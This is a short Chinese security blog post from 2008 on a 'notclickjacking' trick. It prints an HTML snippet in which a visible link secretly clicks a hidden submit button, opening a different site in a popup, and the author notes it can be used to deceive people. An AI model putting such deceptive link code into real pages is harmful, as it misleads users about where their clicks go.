notclickjacking

首页 > 网络安全 > notclickjacking

2008年9月26日发表评论阅读评论

ps:这两天说的很疯狂。记录下来，有时写代码可以欺骗一下别人。。

<form name="my_form_tres" action=""<br />onSubmit=window.open("http://www.example.com")><br /><input type="submit" id="my_submit_button_tres"<br />style="position:absolute;left:0px;visibility:hidden;"/><br /><a href="http://www.breakingpointsystems.com"<br />onMouseUp=document.getElementById(&#039;my_submit_button_tres&#039;).click()>Fake<br />link (onmouseup and click)</a> <br /></form>

更多示例：http://www.planb-security.net/notclickjacking/

转载请注明：woyigui's blog [http://www.woyigui.cn/]
本文标题：notclickjacking
本文地址：http://www.woyigui.cn/2008/09/26/notclickjacking/

woyigui 分类: 网络安全标签: 跨站

评论 (0) Trackbacks (0) 发表评论 Trackback

本文目前尚无任何评论.

本文目前尚无任何 trackbacks 和 pingbacks.

Web2_0Security pdf PHP $_FILES详解

WoYiGui's BloG | 关注安全测试

notclickjacking

最新推荐

猜你喜欢

最新评论

WoYiGui's BloG | 关注安全测试

notclickjacking

最新推荐

猜你喜欢

最新评论

标签云